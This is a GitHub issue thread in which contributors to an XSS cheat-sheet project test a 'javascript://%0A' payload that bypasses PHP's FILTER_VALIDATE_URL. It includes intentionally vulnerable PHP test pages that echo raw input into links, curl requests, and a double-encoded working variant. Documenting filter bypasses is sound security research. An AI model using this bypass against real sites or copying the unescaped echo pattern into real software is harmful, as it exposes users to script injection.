### ISSUE TITLE
javascript://%0A

### ISSUE THREAD

**Issue by ngyikp** [PortSwigger/xss-cheatsheet-data#20]
https://security.stackexchange.com/a/30331

`javascript://%0Aalert('XSS');`

This can be useful to pass PHP's FILTER_VALIDATE_URL

```
$ docker run -it --rm php:8.0.3-cli-alpine3.13 php -a
Interactive shell

php > var_dump(filter_var('https://example.com', FILTER_VALIDATE_URL) !== false);
bool(true)

php > var_dump(filter_var('javascript:alert(1)', FILTER_VALIDATE_URL) !== false);
bool(false)

php > var_dump(filter_var('javascript://%0Aalert(1)', FILTER_VALIDATE_URL) !== false);
bool(true)
```

**Comment by theMiddleBlue** [comment]
Hi @ngyikp 

that seems true inside the interactive shell but, for some reason, is not true trying it via the PHP embedded webserver.

I've created this simple test:
```php
<?php 
    if(filter_var($_GET["url"], FILTER_VALIDATE_URL)) {
?>
<html>
    <body>
        <a href="<?php echo $_GET["url"]; ?>">Follow this URL</a>
    </body>
</html>
<?php
    } else {
        echo "\nInvalid URL\nVar Dump: ";
        echo var_dump(filter_var($_GET["url"], FILTER_VALIDATE_URL));
        echo "Debug: ".$_GET["url"]."\n\n";
    }
?>
```

test 1 with php:8.0.3-cli-pine3.13
```bash
# ok
curl -s 'http://localhost/?url=http://example.com'
<html>
    <body>
        <a href="http://example.com">Follow this URL</a>
    </body>
</html>

# filtered
curl -s 'http://localhost/?url=javascript://%0Aalert(1)'
Invalid URL
Var Dump: bool(false)
Debug: javascript://
alert(1)


# filtered encoding fwd slash
curl -s 'http://localhost/?url=javascript:%2f%2f%0Aalert(1)'
Invalid URL
Var Dump: bool(false)
Debug: javascript://
alert(1)

```

same results testing on PHP 7.3.24
am I missing something? any idea?

**Comment by theMiddleBlue** [comment]
P.S.

javascript:alert(1) seems valid in my test:

```bash
$ curl -s 'http://localhost/?url=javascript://alert(1)'
<html>
    <body>
        <a href="javascript://alert(1)">Follow this URL</a>
    </body>
</html>

```

**Comment by ngyikp** [comment]
`javascript://alert(1)` won't execute XSS, the newline `%0A` is needed

Here's my test script:
```php
<form action="index.php" method="POST">
<input type="text" name="out">
<button type="submit">Go</button>
</form>

<?php

$out = $_POST['out'] ?? null;

echo phpversion();
echo '<br>';
var_dump($out);
echo '<br>';
var_dump(filter_var($out, FILTER_VALIDATE_URL) !== false);
echo '<br>';
echo '<a href="'.$out.'">out</a>';
```
Then submit `javascript://%0Aalert('XSS');` into the textbox

![screenshot](https://user-images.githubusercontent.com/6135313/113413616-f9d6d580-93b2-11eb-9e65-e4418c36ce0d.png)

**Comment by theMiddleBlue** [comment]
can you try with my test app? If you see my payloads in my previous comments I always used newline %0a

**Comment by ngyikp** [comment]
`http://localhost/b.php?url=javascript://%250Aalert(%27XSS%27);` works :D

![screenshot](https://user-images.githubusercontent.com/6135313/113414682-7e2a5800-93b5-11eb-9dda-82a7dfda1c1b.png)

**Comment by theMiddleBlue** [comment]
oh thanks! I missed the encoding of `%` %250a works for me too! thanks!

**Comment by hackvertor** [comment]
I'll add this to the cheat sheet when I get chance. This should be in the protocols section but I forgot to include it.

**Comment by hackvertor** [comment]
This has been added the cheat sheet will be updated soon.
